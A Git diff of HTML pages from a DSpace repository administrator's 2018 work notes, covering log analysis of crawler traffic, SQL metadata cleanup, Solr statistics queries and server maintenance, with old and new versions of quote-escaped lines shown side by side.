<li>I&rsquo;m not sure how to proceed without writing some script to parse and join the CSVs, and I don&rsquo;t think it&rsquo;s worth my time</li>
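<li>If I did write one, a minimal sketch with pandas would do it, since concatenating DataFrames unions the differing columns:</li>
</ul>
<pre tabindex="0"><code>$ # a sketch: stack the per-item CSVs into one file, leaving missing columns blank
$ python3 -c &quot;import sys; import pandas as pd; pd.concat([pd.read_csv(f) for f in sys.argv[1:]]).to_csv('/tmp/iwmi-gender-combined.csv', index=False)&quot; /tmp/10568-*.csv
</code></pre>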

View File

@ -30,7 +30,7 @@ I&rsquo;ll update the DSpace role in our Ansible infrastructure playbooks and ru
Also, I&rsquo;ll re-run the postgresql tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month
I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -124,7 +124,7 @@ I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
<li>I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:</li>
</ul>
<pre tabindex="0"><code>02-Sep-2018 11:18:52.678 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4776)
at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5240)
@ -139,7 +139,7 @@ I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations:
</code></pre><ul>
<li>Full log here: <a href="https://gist.github.com/alanorth/1e4ae567b853fea9d9dbf1a030ecd8c2">https://gist.github.com/alanorth/1e4ae567b853fea9d9dbf1a030ecd8c2</a></li>
<li>XMLUI fails to load, but the REST, SOLR, JSPUI, etc work</li>
@ -191,13 +191,13 @@ requests:
method: GET
url: https://dspacetest.cgiar.org/rest/test
validate:
raw: &quot;REST api is running.&quot;
login:
url: https://dspacetest.cgiar.org/rest/login
method: POST
data:
json: {&quot;email&quot;:&quot;test@dspace&quot;,&quot;password&quot;:&quot;thepass&quot;}
status:
url: https://dspacetest.cgiar.org/rest/status
@ -229,15 +229,15 @@ $ dspace community-filiator --set -p 10568/97114 -c 10568/3112
</code></pre><ul>
<li>Valerio contacted me to point out some issues with metadata on CGSpace, which I corrected in PostgreSQL:</li>
</ul>
<pre tabindex="0"><code>update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI Juornal';
<pre tabindex="0"><code>update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;ISI Juornal&#39;;
UPDATE 1
update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI journal';
UPDATE 23
update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='YES';
UPDATE 1
delete from metadatavalue where resource_type_id=2 and metadata_field_id=226 and text_value='NO';
DELETE 17
update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI';
UPDATE 15
</code></pre><ul>
<li>Start working on adding metadata for access and usage rights that we started earlier in 2018 (and also in 2017)</li>
@ -246,7 +246,7 @@ UPDATE 15
<li>Linode said that CGSpace (linode18) had a high CPU load earlier today</li>
<li>When I looked, I see it&rsquo;s the same Russian IP that I noticed last month:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;10/Sep/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;10/Sep/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1459 157.55.39.202
1579 95.108.181.88
1615 157.55.39.147
@ -260,7 +260,7 @@ UPDATE 15
</code></pre><ul>
<li>And this bot is still creating more Tomcat sessions than Nginx requests (WTF?):</li>
</ul>
<pre tabindex="0"><code># grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-09-10
<pre tabindex="0"><code># grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2018-09-10
14133
</code></pre><ul>
<li>The user agent is still the same:</li>
@ -270,7 +270,7 @@ UPDATE 15
<li>I added <code>.*crawl.*</code> to the Tomcat Session Crawler Manager Valve, so I&rsquo;m not sure why the bot is creating so many sessions&hellip;</li>
<li>I just tested that user agent on CGSpace and it <em>does not</em> create a new session:</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh https://cgspace.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'
<pre tabindex="0"><code>$ http --print Hh https://cgspace.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&#39;
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
@ -319,7 +319,7 @@ $ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e
<li>Linode says that CGSpace (linode18) has had high CPU for the past two hours</li>
<li>The top IP addresses today are:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &quot;13/Sep/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#34;13/Sep/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
32 46.229.161.131
38 104.198.9.108
39 66.249.64.91
@ -333,9 +333,9 @@ $ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e
</code></pre><ul>
<li>And the top two addresses seem to be re-using their Tomcat sessions properly:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=70.32.83.92' dspace.log.2018-09-13 | sort | uniq
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=70.32.83.92&#39; dspace.log.2018-09-13 | sort | uniq
7
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-13 | sort | uniq
2
</code></pre><ul>
<li>So I&rsquo;m not sure what&rsquo;s going on</li>
@ -397,12 +397,12 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
<li>There are some example queries on the <a href="https://wiki.lyrasis.org/display/DSPACE/Solr">DSpace Solr wiki</a></li>
<li>For example, this query returns 1655 rows for item <a href="https://cgspace.cgiar.org/handle/10568/10630">10568/10630</a>:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&#39;
</code></pre><ul>
<li>The id in the Solr query is the item&rsquo;s database id (get it from the REST API or something)</li>
<li>Next, I adapted a query to get the downloads and it shows 889, which is similar to the number Atmire&rsquo;s statlet shows, though the query logic here is confusing:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-(bundleName:[*+TO+*]-bundleName:ORIGINAL)&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-(bundleName:[*+TO+*]-bundleName:ORIGINAL)&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)&#39;
</code></pre><ul>
<li>According to the <a href="https://wiki.apache.org/solr/SolrQuerySyntax">SolrQuerySyntax</a> page on the Apache wiki, the <code>[* TO *]</code> syntax just selects a range (in this case all values for a field)</li>
<li>So it seems to be:
@ -413,15 +413,15 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
</li>
<li>What the shit, I think I&rsquo;m right: the simplified logic in <em>this</em> query returns the same 889:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)&#39;
</code></pre><ul>
<li>And if I simplify the <code>statistics_type</code> logic the same way, it still returns the same 889!</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=statistics_type:view'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=statistics_type:view&#39;
</code></pre><ul>
<li>As for item views, I suppose that&rsquo;s just the same query, minus the <code>bundleName:ORIGINAL</code>:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-bundleName:ORIGINAL&amp;fq=statistics_type:view'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-bundleName:ORIGINAL&amp;fq=statistics_type:view&#39;
</code></pre><ul>
<li>That one returns 766, which is exactly 1655 minus 889&hellip;</li>
<li>Also, Solr&rsquo;s <code>fq</code> is similar to the regular <code>q</code> query parameter, but it is considered for the Solr query cache so it should be faster for multiple queries</li>
@ -432,11 +432,11 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
<li>It uses the Python-based <a href="https://falcon.readthedocs.io">Falcon</a> web framework and talks to Solr directly using the <a href="https://github.com/moonlitesolutions/SolrClient">SolrClient</a> library (which seems to have issues in Python 3.7 currently)</li>
<li>After deploying on DSpace Test I can then get the stats for an item using its ID:</li>
</ul>
<pre tabindex="0"><code>$ http -b 'https://dspacetest.cgiar.org/rest/statistics/item?id=110988'
<pre tabindex="0"><code>$ http -b &#39;https://dspacetest.cgiar.org/rest/statistics/item?id=110988&#39;
{
&quot;downloads&quot;: 2,
&quot;id&quot;: 110988,
&quot;views&quot;: 15
}
</code></pre><ul>
<li>The numbers are different than those that come from Atmire&rsquo;s statlets for some reason, but as I&rsquo;m querying Solr directly, I have no idea where their numbers come from!</li>
@ -533,7 +533,7 @@ sqlite&gt; INSERT INTO items(id, views) VALUES(0, 7) ON CONFLICT(id) DO UPDATE S
<pre tabindex="0"><code># python3
Python 3.5.2 (default, Nov 23 2017, 16:37:01)
[GCC 5.4.0 20160609] on linux
Type &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.
&gt;&gt;&gt; import sqlite3
&gt;&gt;&gt; print(sqlite3.sqlite_version)
3.24.0
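&gt;&gt;&gt; # 3.24.0 is the first SQLite release with INSERT ... ON CONFLICT (upsert), so this is new enough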
@ -606,7 +606,7 @@ Indexing item downloads (page 260 of 260)
<li>I will have to keep an eye on that over the next few weeks to see if things stay as they are</li>
<li>I did a batch replacement of the access rights with my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> script on DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-access-status.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.status -t correct -m 206
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-access-status.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.identifier.status -t correct -m 206
</code></pre><ul>
<li>This changes &ldquo;Open Access&rdquo; to &ldquo;Unrestricted Access&rdquo; and &ldquo;Limited Access&rdquo; to &ldquo;Restricted Access&rdquo;</li>
<li>After that I did a full Discovery reindex:</li>
@ -629,7 +629,7 @@ sys 2m18.485s
<li>Linode emailed to say that CGSpace&rsquo;s (linode19) CPU load was high for a few hours last night</li>
<li>Looking in the nginx logs around that time I see some new IPs that look like they are harvesting things:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;26/Sep/2018:(19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;26/Sep/2018:(19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
295 34.218.226.147
296 66.249.64.95
350 157.55.39.185
@ -645,9 +645,9 @@ sys 2m18.485s
<li><code>68.6.87.12</code> is on Cox Communications in the US (?)</li>
<li>These hosts are not using proper user agents and are not re-using their Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-09-26 | sort | uniq
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180&#39; dspace.log.2018-09-26 | sort | uniq
5423
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12' dspace.log.2018-09-26 | sort | uniq
758
</code></pre><ul>
<li>I will add their IPs to the list of bad bots in nginx so we can add a &ldquo;bot&rdquo; user agent to them and let Tomcat&rsquo;s Crawler Session Manager Valve handle them</li>
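<li>In nginx that would be something like the following map (a sketch of the idea, not the literal config in the playbooks):</li>
</ul>
<pre tabindex="0"><code># override the user agent for known bad IPs so the Crawler Session Manager Valve catches them (sketch)
map $remote_addr $ua {
    default        $http_user_agent;
    35.237.175.180 'bot';
    68.6.87.12     'bot';
}
# ...then pass it upstream with: proxy_set_header User-Agent $ua;
</code></pre><ul>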
@ -659,8 +659,8 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12' dspace.log.2018-09-26
<li>Peter sent me a list of 43 author names to fix, but it had some encoding errors like <code>Belalcázar, John</code> like usual (I will tell him to stop trying to export as UTF-8 because it never seems to work)</li>
<li>I did batch replaces for both on CGSpace with my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-09-29-fix-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
$ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-09-29-fix-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t correct -m 211
$ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
</code></pre><ul>
<li>Afterwards I started a full Discovery re-index:</li>
</ul>
@ -675,18 +675,18 @@ $ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p
<li>Valerio keeps sending items on CGSpace that have weird or incorrect languages, authors, etc</li>
<li>I think I should just batch export and update all languages&hellip;</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2018-09-30-languages.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2018-09-30-languages.csv with csv;
</code></pre><ul>
<li>Then I can simply delete the &ldquo;Other&rdquo; and &ldquo;other&rdquo; ones because that&rsquo;s not useful at all:</li>
</ul>
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Other';
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;Other&#39;;
DELETE 6
dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='other';
DELETE 79
</code></pre><ul>
<li>Looking through the list I see some weird language codes like <code>gh</code>, so I checked out those items:</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
<pre tabindex="0"><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;gh&#39;;
resource_id
-------------
94530
@ -699,12 +699,12 @@ dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2
</code></pre><ul>
<li>Those items are from Ghana, so the submitter apparently thought <code>gh</code> was a language&hellip; I can safely delete them:</li>
</ul>
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;gh&#39;;
DELETE 2
</code></pre><ul>
<li>The next issue would be <code>jn</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
<pre tabindex="0"><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;jn&#39;;
resource_id
-------------
94001
@ -718,12 +718,12 @@ dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2
<li>Those items are about Japan, so I will update them to be <code>ja</code></li>
<li>Other replacements:</li>
</ul>
<pre tabindex="0"><code>DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
UPDATE metadatavalue SET text_value='fr' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='fn';
UPDATE metadatavalue SET text_value='hi' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='in';
UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Ja';
UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jp';
<pre tabindex="0"><code>DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;gh&#39;;
UPDATE metadatavalue SET text_value=&#39;fr&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;fn&#39;;
UPDATE metadatavalue SET text_value=&#39;hi&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;in&#39;;
UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;Ja&#39;;
UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;jn&#39;;
UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;jp&#39;;
</code></pre><ul>
<li>Then there are 12 items with <code>en|hi</code>, but they were all in one collection so I just exported it as a CSV and then re-imported the corrected metadata</li>
</ul>
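<ul>
<li>That workflow is roughly the following (a sketch; the actual sed fix depends on what the values should have been):</li>
</ul>
<pre tabindex="0"><code>$ # 10568/12345 and the email are placeholders
$ dspace metadata-export -i 10568/12345 -f /tmp/en-hi.csv
$ sed -i 's/en|hi/en||hi/g' /tmp/en-hi.csv
$ dspace metadata-import -f /tmp/en-hi.csv -e user@example.com
</code></pre>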

View File

@ -26,7 +26,7 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items
I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nairobi right now
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -121,7 +121,7 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
<ul>
<li>I see Moayad was busy collecting item views and downloads from CGSpace yesterday:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Oct/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Oct/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
933 40.77.167.90
971 95.108.181.88
1043 41.204.190.40
@ -135,13 +135,13 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
</code></pre><ul>
<li>Of those, about 20% were HTTP 500 responses (!):</li>
</ul>
<pre tabindex="0"><code>$ zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Oct/2018&quot; | grep 34.218.226.147 | awk '{print $9}' | sort -n | uniq -c
<pre tabindex="0"><code>$ zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Oct/2018&#34; | grep 34.218.226.147 | awk &#39;{print $9}&#39; | sort -n | uniq -c
118927 200
31435 500
</code></pre><ul>
<li>I added Phil Thornton and Sonal Henson&rsquo;s ORCID identifiers to the controlled vocabulary for <code>cg.creator.orcid</code> and then re-generated the names using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; 2018-10-03-orcids.txt
<pre tabindex="0"><code>$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; 2018-10-03-orcids.txt
$ ./resolve-orcids.py -i 2018-10-03-orcids.txt -o 2018-10-03-names.txt -d
</code></pre><ul>
<li>I found a new corner case error that I need to check, given <em>and</em> family names deactivated:</li>
@ -154,7 +154,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>Linode sent another alert about CPU usage on CGSpace (linode18) this evening</li>
<li>It seems that Moayad is making quite a lot of requests today:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Oct/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Oct/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1594 157.55.39.160
1627 157.55.39.173
1774 136.243.6.84
@ -169,13 +169,13 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>But in super positive news, he says they are using my new <a href="https://github.com/alanorth/dspace-statistics-api">dspace-statistics-api</a> and it&rsquo;s MUCH faster than using Atmire CUA&rsquo;s internal &ldquo;restlet&rdquo; API</li>
<li>I don&rsquo;t recognize the <code>138.201.49.199</code> IP, but it is in Germany (Hetzner) and appears to be paginating over some browse pages and downloading bitstreams:</li>
</ul>
<pre tabindex="0"><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /[a-z]+' | sort | uniq -c
<pre tabindex="0"><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E &#39;GET /[a-z]+&#39; | sort | uniq -c
8324 GET /bitstream
4193 GET /handle
</code></pre><ul>
<li>Suspiciously, it&rsquo;s only grabbing the CGIAR System Office community (handle prefix 10947):</li>
</ul>
<pre tabindex="0"><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /handle/[0-9]{5}' | sort | uniq -c
